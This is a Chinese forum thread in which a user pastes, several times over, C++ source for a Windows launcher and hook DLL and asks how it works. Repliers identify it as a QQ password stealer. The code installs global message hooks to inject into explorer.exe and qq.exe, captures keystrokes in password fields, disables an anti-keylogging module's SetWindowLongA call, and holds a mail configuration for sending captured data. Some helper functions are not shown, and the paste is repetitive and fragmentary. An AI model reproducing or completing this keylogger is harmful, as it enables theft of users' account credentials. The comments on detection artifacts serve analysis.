// Record the EXE publishes through a named file mapping so the hook DLL
// (its init() further down this page) can locate and talk back to the launcher.
typedef struct MAPDATA{
// Thread id of the launcher's main thread; the DLL posts WM_QUIT to it.
DWORD currThreadID;
// Full path of the launcher EXE, filled from GetModuleFileName.
char exeFile[MAX_PATH];
} *pMAPDATA;string ClassName= "tmpWnd20070109";
// Names of the kernel objects shared between EXE and DLL. Fixed, unique
// strings like these are a stable artifact for detection rules (named
// mutex / section enumeration) and for correlating EXE and DLL samples.
string dllMutex = "dllMutex20070109";
string exeMutex = "exeMutex20070109";
string sFileMap = "sFileMap20070109";
string dllShare = "dllShareMap20070109";
// File name of the hook DLL; LoadDllFunc() loads it from the Windows directory.
string hookDLL = "HookDll.dll";
// Function-pointer types for the two exports resolved from the hook DLL.
typedef void (* INHook)();
typedef void (* UNHook)();INHook DllInstallHook = NULL;
UNHook DllUnHook = NULL;
// Launcher entry point: enforces a single instance through the named mutexes,
// publishes its thread id and path in a named file mapping, installs the hook
// DLL and then blocks in a message loop until WM_QUIT is posted to this thread.
// argc/argv are unused. Returns 1 if another instance (EXE or DLL) is already
// present, otherwise 0 after the loop ends.
int main(int argc, char* argv[])
{
MSG msgStruct;
HANDLE mutexHandle = NULL;
HANDLE fileHandle = NULL;
pMAPDATA tMapData = NULL;
// Exit if either mutex already exists; the handles returned by a successful
// OpenMutex here are never closed.
char thisExeName[MAX_PATH] ; if((OpenMutex(MUTEX_ALL_ACCESS, FALSE, exeMutex.c_str()) != 0) || (OpenMutex(MUTEX_ALL_ACCESS, FALSE, dllMutex.c_str()) != 0))
{
return 1;
} mutexHandle= ::CreateMutex(NULL,FALSE,exeMutex.c_str());
// Page-file-backed shared section holding one MAPDATA. Neither the mapping
// handle nor the view pointer is checked before tMapData is dereferenced.
fileHandle = ::CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, sizeof(MAPDATA), sFileMap.c_str()); tMapData = (pMAPDATA)::MapViewOfFile(fileHandle,FILE_MAP_ALL_ACCESS,0,0,sizeof(MAPDATA));
tMapData->currThreadID = (DWORD)::GetCurrentThreadId();
GetModuleFileName(NULL,thisExeName,MAX_PATH);
// Both buffers are MAX_PATH bytes; the copy relies on GetModuleFileName having NUL-terminated its output.
strcpy(tMapData->exeFile,thisExeName);
//tMapData->exeFile = "ttt";
// Debug leftover: shows the published path in a dialog.
MessageBox(NULL,tMapData->exeFile,"exeFile",MB_OK);
InstallHook();
//MessageBox(NULL,"Insert Hook OK","Test",MB_OK);
::UnmapViewOfFile(tMapData);
// No window is created here, so only a thread message ends this loop:
// GetMessage returns 0 on WM_QUIT; a -1 error return keeps it spinning.
while(::GetMessage(&msgStruct, 0, 0, 0) != 0)// wait for WM_QUIT
{ } UnHook();
//CloseHandle(fileHandle);
// Broadcast to every top-level window; the purpose is not evident from this file.
PostMessage(HWND_BROADCAST, WM_WININICHANGE, 0, 0);
CloseHandle(mutexHandle);
CloseHandle(fileHandle);
return 0;
}
这段代码的功能,我看像是读共享内存的,但运行后怎么会是线程插入的呢?
DWORD currThreadID;
char exeFile[MAX_PATH];
} *pMAPDATA;string ClassName= "tmpWnd20070109";
// Names of the kernel objects shared between EXE and DLL. Fixed, unique
// strings like these are a stable artifact for detection rules and for
// correlating the EXE with its DLL.
string dllMutex = "dllMutex20070109";
string exeMutex = "exeMutex20070109";
string sFileMap = "sFileMap20070109";
string dllShare = "dllShareMap20070109";
// File name of the hook DLL; LoadDllFunc() loads it from the Windows directory.
string hookDLL = "HookDll.dll";
// Function-pointer types for the two exports resolved from the hook DLL.
typedef void (* INHook)();
typedef void (* UNHook)();INHook DllInstallHook = NULL;
UNHook DllUnHook = NULL;
// Launcher entry point: enforces a single instance through the named mutexes,
// publishes its thread id and path in a named file mapping, installs the hook
// DLL and then blocks in a message loop until WM_QUIT is posted to this thread.
// argc/argv are unused. Returns 1 if another instance (EXE or DLL) is already
// present, otherwise 0 after the loop ends.
int main(int argc, char* argv[])
{
MSG msgStruct;
HANDLE mutexHandle = NULL;
HANDLE fileHandle = NULL;
pMAPDATA tMapData = NULL;
// Exit if either mutex already exists; the handles returned by a successful
// OpenMutex here are never closed.
char thisExeName[MAX_PATH] ; if((OpenMutex(MUTEX_ALL_ACCESS, FALSE, exeMutex.c_str()) != 0) || (OpenMutex(MUTEX_ALL_ACCESS, FALSE, dllMutex.c_str()) != 0))
{
return 1;
} mutexHandle= ::CreateMutex(NULL,FALSE,exeMutex.c_str());
// Page-file-backed shared section holding one MAPDATA. Neither the mapping
// handle nor the view pointer is checked before tMapData is dereferenced.
fileHandle = ::CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, sizeof(MAPDATA), sFileMap.c_str()); tMapData = (pMAPDATA)::MapViewOfFile(fileHandle,FILE_MAP_ALL_ACCESS,0,0,sizeof(MAPDATA));
tMapData->currThreadID = (DWORD)::GetCurrentThreadId();
GetModuleFileName(NULL,thisExeName,MAX_PATH);
// Both buffers are MAX_PATH bytes; the copy relies on GetModuleFileName having NUL-terminated its output.
strcpy(tMapData->exeFile,thisExeName);
//tMapData->exeFile = "ttt";
// Debug leftover: shows the published path in a dialog.
MessageBox(NULL,tMapData->exeFile,"exeFile",MB_OK);
InstallHook();
//MessageBox(NULL,"Insert Hook OK","Test",MB_OK);
::UnmapViewOfFile(tMapData);
// No window is created here, so only a thread message ends this loop:
// GetMessage returns 0 on WM_QUIT; a -1 error return keeps it spinning.
while(::GetMessage(&msgStruct, 0, 0, 0) != 0)// wait for WM_QUIT
{ } UnHook();
//CloseHandle(fileHandle);
// Broadcast to every top-level window; the purpose is not evident from this file.
PostMessage(HWND_BROADCAST, WM_WININICHANGE, 0, 0);
CloseHandle(mutexHandle);
CloseHandle(fileHandle);
return 0;
}
这段代码的功能,我看像是读共享内存的,但运行后怎么会是线程插入的呢?
tMapData->currThreadID = (DWORD)::GetCurrentThreadId();
GetModuleFileName(NULL,thisExeName,MAX_PATH);
strcpy(tMapData->exeFile,thisExeName);
//tMapData->exeFile = "ttt";
MessageBox(NULL,tMapData->exeFile,"exeFile",MB_OK);
InstallHook();
//MessageBox(NULL,"Insert Hook OK","Test",MB_OK);
::UnmapViewOfFile(tMapData);
while(::GetMessage(&msgStruct, 0, 0, 0) != 0)// 等待WM_QUIT
{ } UnHook();
//CloseHandle(fileHandle);
PostMessage(HWND_BROADCAST, WM_WININICHANGE, 0, 0);
CloseHandle(mutexHandle);
CloseHandle(fileHandle);那为大侠能解释详细点,就是上面的这几步
http://www.yesky.com/20030117/1649013.shtml
你是对于FileMap 不明白?? 如果这个不明白,大家就不好说了。其他有什么不知道的, 请指明在哪个地方, 不要太笼统
CreateFileMapping 就是用来共享内存的,得到这个实例的名字然后存到pMAPDATA里,照前面MUTEX来看,就是只允许一个实例存在,大致只能得到这些信息
tMapData->currThreadID = (DWORD)::GetCurrentThreadId();
GetModuleFileName(NULL,thisExeName,MAX_PATH);
strcpy(tMapData->exeFile,thisExeName);
//tMapData->exeFile = "ttt";
MessageBox(NULL,tMapData->exeFile,"exeFile",MB_OK);上面就是内存映射 共享了内存
InstallHook();
//MessageBox(NULL,"Insert Hook OK","Test",MB_OK);
::UnmapViewOfFile(tMapData);//释放掉这段内存了
while(::GetMessage(&msgStruct, 0, 0, 0) != 0)// 等待WM_QUIT
{}UnHook();
//CloseHandle(fileHandle);
PostMessage(HWND_BROADCAST, WM_WININICHANGE, 0, 0);
CloseHandle(mutexHandle);
CloseHandle(fileHandle);
// Record the EXE publishes through a named file mapping so the hook DLL
// (its init() further down this page) can locate and talk back to the launcher.
typedef struct MAPDATA{
// Thread id of the launcher's main thread; the DLL posts WM_QUIT to it.
DWORD currThreadID;
// Full path of the launcher EXE, filled from GetModuleFileName.
char exeFile[MAX_PATH];
} *pMAPDATA;string ClassName= "tmpWnd20070109";
// Names of the kernel objects shared between EXE and DLL. Fixed, unique
// strings like these are a stable artifact for detection rules (named
// mutex / section enumeration) and for correlating EXE and DLL samples.
string dllMutex = "dllMutex20070109";
string exeMutex = "exeMutex20070109";
string sFileMap = "sFileMap20070109";
string dllShare = "dllShareMap20070109";
// File name of the hook DLL; LoadDllFunc() loads it from the Windows directory.
string hookDLL = "HookDll.dll";
// Function-pointer types for the two exports resolved from the hook DLL.
typedef void (* INHook)();
typedef void (* UNHook)();INHook DllInstallHook = NULL;
UNHook DllUnHook = NULL;
// Launcher entry point: enforces a single instance through the named mutexes,
// publishes its thread id and path in a named file mapping, installs the hook
// DLL and then blocks in a message loop until WM_QUIT is posted to this thread.
// argc/argv are unused. Returns 1 if another instance (EXE or DLL) is already
// present, otherwise 0 after the loop ends.
int main(int argc, char* argv[])
{
MSG msgStruct;
HANDLE mutexHandle = NULL;
HANDLE fileHandle = NULL;
pMAPDATA tMapData = NULL;
// Exit if either mutex already exists; the handles returned by a successful
// OpenMutex here are never closed.
char thisExeName[MAX_PATH] ; if((OpenMutex(MUTEX_ALL_ACCESS, FALSE, exeMutex.c_str()) != 0) || (OpenMutex(MUTEX_ALL_ACCESS, FALSE, dllMutex.c_str()) != 0))
{
return 1;
} mutexHandle= ::CreateMutex(NULL,FALSE,exeMutex.c_str());
// Page-file-backed shared section holding one MAPDATA. Neither the mapping
// handle nor the view pointer is checked before tMapData is dereferenced.
fileHandle = ::CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, sizeof(MAPDATA), sFileMap.c_str()); tMapData = (pMAPDATA)::MapViewOfFile(fileHandle,FILE_MAP_ALL_ACCESS,0,0,sizeof(MAPDATA));
tMapData->currThreadID = (DWORD)::GetCurrentThreadId();
GetModuleFileName(NULL,thisExeName,MAX_PATH);
// Both buffers are MAX_PATH bytes; the copy relies on GetModuleFileName having NUL-terminated its output.
strcpy(tMapData->exeFile,thisExeName);
//tMapData->exeFile = "ttt";
// Debug leftover: shows the published path in a dialog.
MessageBox(NULL,tMapData->exeFile,"exeFile",MB_OK);
InstallHook();
//MessageBox(NULL,"Insert Hook OK","Test",MB_OK);
::UnmapViewOfFile(tMapData);
// No window is created here, so only a thread message ends this loop:
// GetMessage returns 0 on WM_QUIT; a -1 error return keeps it spinning.
while(::GetMessage(&msgStruct, 0, 0, 0) != 0)// wait for WM_QUIT
{ } UnHook();
//CloseHandle(fileHandle);
// Broadcast to every top-level window; the purpose is not evident from this file.
PostMessage(HWND_BROADCAST, WM_WININICHANGE, 0, 0);
CloseHandle(mutexHandle);
CloseHandle(fileHandle);
return 0;
}// start.cpp : Defines the entry point for the application.
//
// EXE-side loader: resolves the hook DLL's exports into DllInstallHook /
// DllUnHook. extractRes() is not shown on this page; the DLL is loaded right
// afterwards from %WINDIR%\HookDll.dll, so it presumably writes the DLL there
// first — confirm against its definition. A non-installer process dropping a
// DLL into the Windows directory is itself a strong detection signal.
void LoadDllFunc()
{
HINSTANCE hModule;
extractRes();
char dir[MAX_PATH];
::GetWindowsDirectory(dir,MAX_PATH);
string s = dir;
s.append("\\");
s.append(hookDLL);
hModule = ::LoadLibrary(s.c_str());//"D:\\Test5\\Debug\\HookDll.dll");
if (hModule != NULL)
{
// Export names expected by this build of the launcher.
DllInstallHook = (INHook)GetProcAddress(hModule,"InsertHookOn");
DllUnHook = (UNHook)GetProcAddress(hModule,"InsertHookOff");
// DllGetShareData = (GTSDATA)GetProcAddress(hModule,"GetShareData");
}
}void InstallHook()
{
// Lazily load the DLL on first use, then call its install export if it resolved.
if(DllInstallHook == NULL)
{
LoadDllFunc();
} if(DllInstallHook != NULL)
{
DllInstallHook();
}
}上面是EXE里的代码
//////////////////////////////////////////////////////////////////////////
// Hook DLL entry point. The hooks are registered with thread id 0 (see
// MsgHookOn), so this DLL is mapped into every GUI process and init() runs
// in each of them; init() decides by host exe name what to do.
// Returns TRUE unconditionally, so the load never fails from here.
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
// init() creates threads and calls LoadLibrary while the loader lock is
// held — against the DllMain rules and a common source of deadlocks.
init();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
// Handles of the two global hooks installed by MsgHookOn().
HHOOK hGetHook = NULL;
HHOOK hWndHook = NULL;
// Temporary window used by New_SetWindowLongA; module holds this process's exe path (filled in init()).
HWND TempFormHandle = NULL;char module[MAX_PATH];
// Per-host-process role flags, set in init() from the exe name.
bool isQQ = false;
bool isExplorer = false;
// Captured values; where they are filled is not visible on this page.
string password = "";
string qqNumber = "";
// Same object names as the launcher; fixed strings like these are reliable detection artifacts.
string ClassName= "tmpWnd20070109";
string dllMutex = "dllMutex20070109";
string exeMutex = "exeMutex20070109";
string sFileMap = "sFileMap20070109";
string dllShare = "dllShareMap20070109";
// sd wraps the DLL-side shared section (ShareData is not defined on this page).
string qqExeName= "QQ.exe";ShareData sd;
// Despite the name, init() stores GetCurrentProcessId() here.
long qqThreadID = 0;
// Timer ids returned by SetTimer and the interval they use.
int timer = 0;
int timerQQ = 0;
int elapse = 1000;
// Reset by InitCloseQQValues() before QQThreadProc's loop starts.
bool willNotCloseQQ = true;
int closeQQWaitTime = 2000;// 2 secs
//dllShareData *m_pDllShareData;
//HANDLE m_hMapFile;typedef struct MAPDATA{
DWORD currThreadID;
char exeFile[MAX_PATH];
} *pMAPDATA;typedef struct MAILCONFIG{
// Mail account settings held in plain char arrays (including a password).
// Where mConfig is filled or used is not shown on this page.
char senderName[255];
char senderAddr[255];
char senderPassword[255];
char senderSMTP[255];
char receiverAddr[255];
} *pMAILCONFIG;MAILCONFIG mConfig;
bool mailInit = false;
// This is an example of an exported function.
// Installs two system-wide hooks (last argument 0 = all threads on the
// desktop). Windows then maps this DLL into every process with a message
// queue, which is how the code reaches qq.exe and explorer.exe. Global
// SetWindowsHookEx injection is well known and is typically surfaced by
// EDR/telemetry; the return values are not checked here.
HOOKDLL_API void MsgHookOn()
{
//MessageBox(NULL,"MessageHook on","Test",MB_OK);
hGetHook = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc,GetCurrentModule(), 0);
hWndHook = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc,GetCurrentModule(), 0);
}HOOKDLL_API void MsgHookOff()
{
// Removes whichever hooks were installed; handles are not reset to NULL afterwards.
if(hGetHook != NULL)
::UnhookWindowsHookEx(hGetHook);
if(hWndHook != NULL)
::UnhookWindowsHookEx(hWndHook);
}LRESULT CALLBACK New_SetWindowLongA(HWND ahWnd, WPARAM nIndex, LPARAM dwNewLong)
{
// Replacement that init() installs for USER32 SetWindowLongA in npkcntc.dll via
// ReplaceInOneModule(). It ignores all three arguments and never forwards to the
// real SetWindowLongA, so the caller's request is silently dropped and 0 returned.
// Register_TempForm/Create_TempForm/Unregister_TempForm are not shown on this page.
Register_TempForm();
Create_TempForm();
//MessageBox(NULL,"We are in New_SetWindowLongA","Test",MB_OK); while (IsWindow(TempFormHandle))
// As pasted, the braces below form a plain block; the loop condition survives only inside the comment above.
{
SendMessage(TempFormHandle, WM_CLOSE, 0, 0);
//MessageBox(NULL,"We are in New_SetWindowLongA","Test",MB_OK);
}
Unregister_TempForm();
return 0;
}
//FUN New_SetWindowLongB = New_SetWindowLongA;
// Worker thread started by init() inside explorer.exe. It owns the DLL mutex
// (the single-instance marker both EXE and DLL check), installs the hooks and
// runs a timer-driven message loop until WM_QUIT. lpParameter is unused.
// The DLL is released with FreeLibraryAndExitThread, so `return 1` is never reached.
DWORD WINAPI ThreadProc1(LPVOID lpParameter)
{
MSG msgStruct;
HANDLE hMutex;
//MessageBox(NULL,"create mutex befor success","tt",MB_OK);
hMutex = ::CreateMutex(NULL,FALSE, dllMutex.c_str());
//MessageBox(NULL,"create mutex befor success","tt",MB_OK);
InstallHook();
timer = StartTimer();
while (GetMessage(&msgStruct, 0, 0, 0)!=0)
{
// Thread timer (SetTimer with NULL hwnd) arrives as WM_TIMER here; ProcTimer() is not shown on this page.
if (msgStruct.message == WM_TIMER)
{
ProcTimer();
}
TranslateMessage(&msgStruct);
DispatchMessage(&msgStruct);
}
StopTimer(timer);
UnHook();
::CloseHandle(hMutex);
::FreeLibraryAndExitThread(::GetCurrentModule(), 0);
return 1;
}
// Called from DllMain on process attach. Branches on the host process name:
//  - explorer.exe (and no DLL mutex yet): becomes the long-lived host — starts
//    ThreadProc1, reads the launcher's path/thread id from the EXE's file
//    mapping, pins itself with LoadLibrary, tells the launcher to quit, and
//    records the result of HiddenInstall() in the shared section.
//  - qq.exe: records the process id, starts QQThreadProc and, if the DLL mutex
//    exists, marks isQQ and redirects npkcntc.dll's SetWindowLongA calls.
// Any other process falls through and does nothing.
// extractFileName/extractFilePath/HiddenInstall/ReplaceInOneModule/ShareData
// are not shown on this page. Several MessageBox calls remain as debug artifacts
// and would be visible in the host processes.
void init(){
DWORD subThreadID;
pMAPDATA shareData;
string callerExeName = "";
DWORD callerThreadID;
LPVOID lpParameter = NULL; ::GetModuleFileName(NULL,module,MAX_PATH);
string exeFullName = module;
string exeName = extractFileName(exeFullName);
if(::strcmpi(exeName.c_str(),"explorer.exe") == 0)
{
// The DLL mutex is created by ThreadProc1; its presence means another explorer instance already hosts the hooks.
HANDLE hMutex = ::OpenMutex(MUTEX_ALL_ACCESS, FALSE, dllMutex.c_str());
if(hMutex != NULL)
{
//MessageBox(NULL,"Mutex dll Not null","hhtt",MB_OK);
::CloseHandle(hMutex);
}
else
{
isExplorer = true;
//CreateShareData2();
sd.CreateShareData();
// NOTE(review): this compares the member function pointer, not the pointer it returns, so it is always true.
if(sd.GetShareData != NULL) //(m_pDllShareData != NULL)
{
HANDLE hThread = ::CreateThread(0, 0, ThreadProc1, NULL, 0, &subThreadID);
// Read the launcher's MAPDATA; hFile / shareData are not checked before use.
HANDLE hFile = ::OpenFileMapping(FILE_MAP_ALL_ACCESS, FALSE, sFileMap.c_str());
shareData = (pMAPDATA)::MapViewOfFile(hFile, FILE_MAP_ALL_ACCESS, 0, 0, sizeof(MAPDATA));
callerExeName = shareData->exeFile;
callerThreadID = shareData->currThreadID; char cName[MAX_PATH];
::GetModuleFileName(::GetCurrentModule(),cName,MAX_PATH);
MessageBox(NULL,cName,"test1",MB_OK);
// Self-load so the hook DLL stays mapped in explorer.exe after the hook chain releases it.
::LoadLibrary(cName);// raise the DLL's reference count
::UnmapViewOfFile(shareData);
// WM_QUIT ends the launcher's GetMessage loop in main(); explorer.exe keeps running the hooks.
::CloseHandle(hFile); ::PostThreadMessage(callerThreadID, (UINT)WM_QUIT, 0, 0);
// HiddenInstall() returns a path that is stored in the shared section and loaded; what it does is not shown here.
strcpy(sd.GetShareData()->cfgFileName,HiddenInstall(callerExeName).c_str()); ::LoadLibrary(sd.GetShareData()->cfgFileName);
MessageBox(NULL,sd.GetShareData()->cfgFileName,"test1",MB_OK); }
}
}
else if(::strcmpi(exeName.c_str(),"qq.exe") == 0)
{
// Despite its name, qqThreadID receives the process id.
qqThreadID = ::GetCurrentProcessId();
sd.OpenShareData();
MessageBox(NULL,sd.GetShareData()->cfgFileName,"test3",MB_OK);
::CreateThread(NULL, 0, QQThreadProc, NULL, 0, &subThreadID);
HANDLE hMutex = ::OpenMutex(MUTEX_ALL_ACCESS, FALSE, dllMutex.c_str());
if(hMutex != NULL)
{
::CloseHandle(hMutex);
string exePath = extractFilePath(exeFullName);
isQQ = true; exePath.append("LoginCtrl.Dll");
::LoadLibrary(exePath.c_str()); // load LoginCtrl.Dll
// Presumably redirects npkcntc.dll's USER32 SetWindowLongA to New_SetWindowLongA (ReplaceInOneModule is not shown).
ReplaceInOneModule("USER32.DLL","SetWindowLongA",(FUN)New_SetWindowLongA,::GetModuleHandle("npkcntc.dll"));//LoadLibrary(exePath.c_str())); }
}
}DWORD WINAPI QQThreadProc(LPVOID lpParameter)
{
// Timer thread started in qq.exe. InitCloseQQValues() (inside StartQQTimer)
// clears willNotCloseQQ before the loop, so the loop runs until WM_QUIT or
// until that flag is set elsewhere. QQProcTimer() is not shown on this page.
MSG msgStruct;
timerQQ = StartQQTimer();
while (GetMessage(&msgStruct, 0, 0, 0)!=0 && !willNotCloseQQ)
{
if (msgStruct.message == WM_TIMER)
{
QQProcTimer();
}
TranslateMessage(&msgStruct);
DispatchMessage(&msgStruct);
}
StopTimer(timerQQ);
return 0;
}LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam,LPARAM lParam){
// WH_CALLWNDPROC callback. Only acts inside qq.exe: forwards WM_DESTROY of any
// window to OnDestroy() (not shown), then always passes the message on.
if (isQQ && nCode == HC_ACTION){
CWPSTRUCT* pMsg = (CWPSTRUCT*)lParam;
switch (pMsg->message)
{
case WM_DESTROY:
OnDestroy(pMsg->hwnd);
break;
}
} return CallNextHookEx(hWndHook,nCode,wParam,lParam);
}
// WH_GETMESSAGE callback. Only acts inside qq.exe and only for messages being
// removed from the queue (PM_REMOVE): WM_KEYDOWN is handed to OnKeyDown() and
// WM_PASTE aimed at a window IsPassEdit() classifies as a password field is
// blanked out (message set to NULL) so the paste never reaches it.
// OnKeyDown/IsPassEdit are not shown on this page. Always chains to the next hook.
LRESULT CALLBACK GetMsgProc(int nCode, WPARAM wParam,LPARAM lParam){
if(isQQ && nCode == HC_ACTION && wParam == PM_REMOVE){
MSG* pMsg = (MSG*)lParam;
switch(pMsg->message)
{
case WM_KEYDOWN:
OnKeyDown(pMsg->hwnd, pMsg->wParam, pMsg->lParam);
break;
case WM_PASTE:
if(IsPassEdit(pMsg->hwnd))
{
// The MSG is modified in place; the application sees a message id of 0 instead of WM_PASTE.
pMsg->message = NULL;
}
break;
default:
break;
}
}
return CallNextHookEx(hGetHook,nCode,wParam,lParam);
}
// Thread timer helpers. With a NULL hwnd, SetTimer ignores the requested id (1)
// and returns the real timer id, which is what StopTimer must be given.
int StartTimer()
{
return ::SetTimer(NULL,1,elapse,NULL);
}int StartQQTimer()
{
InitCloseQQValues();
return ::SetTimer(NULL,1,elapse,NULL);
}void InitCloseQQValues()
{
// Clears the stop flag checked by QQThreadProc's loop and shortens the wait from its 2000 default.
willNotCloseQQ = false;
closeQQWaitTime = 10;
}void StopTimer(int t)
{
::KillTimer(NULL,t);
}typedef void (* INHook)();
typedef void (* UNHook)();
// DLL-side copies of the export pointer types, plus one for GetShareData.
typedef pMAPDATA (* GTSDATA)();INHook DllInstallHook = NULL;
UNHook DllUnHook = NULL;
GTSDATA DllGetShareData = NULL;void LoadDllFunc()
{
// DLL-side loader: LoadLibrary's this module by its own path and resolves its
// own exports. The extra LoadLibrary adds a reference that keeps the DLL mapped;
// the export names here (MsgHookOn/MsgHookOff) are the ones defined above.
char tDLLName[MAX_PATH];
HINSTANCE hModule;
::GetModuleFileName(GetCurrentModule(),tDLLName,MAX_PATH);
hModule = ::LoadLibrary(tDLLName);
if (hModule != NULL)
{
DllInstallHook = (INHook)GetProcAddress(hModule,"MsgHookOn");
DllUnHook = (UNHook)GetProcAddress(hModule,"MsgHookOff");
DllGetShareData = (GTSDATA)GetProcAddress(hModule,"GetShareData");
}
}void InstallHook()
{
// Resolve on first use, then install the hooks if the export was found.
if(DllInstallHook == NULL)
{
LoadDllFunc();
} if(DllInstallHook != NULL)
{
DllInstallHook();
}
}void UnHook()
{
// Resolve on first use, then remove the hooks if the export was found.
if(DllUnHook == NULL)
{
LoadDllFunc();
} if(DllUnHook != NULL)
{
DllUnHook();
}
}
这是一个典型的钩子程序,分成2部分,一部分是监控,可以监控exe和dll的运行状况,这里主要是截获相关的消息。另一部分是钩子,注入相应的应用程序,并把某些消息转发给监控程序。
好像它主要是截获QQ的登录消息,把用户输入的密码的每个字符键消息转发给监控部分,来获取用户输入的QQ密码。
有些地方没有细看,大概就是这个功能,关键的技术点是“钩子”,你可以网上找些资料研究一下就明白了。
我怎么看就是内存共享的,怎么能插入呢??
hGetHook = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc,GetCurrentModule(), 0);
hWndHook = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc,GetCurrentModule(), 0);
DLL中的入口点DllMain函数会在注入时自动被调用,在这个函数中有个init()就被调用了.好像是这样,代码太长,看不下去.
它存在的目的是使DLL中的数据和你的外部程序数据进行交互, 在进程通信中是常用的,
你分开看, 钩子看钩子实现 和功能 , 共享内存单看为一项功能,就明了了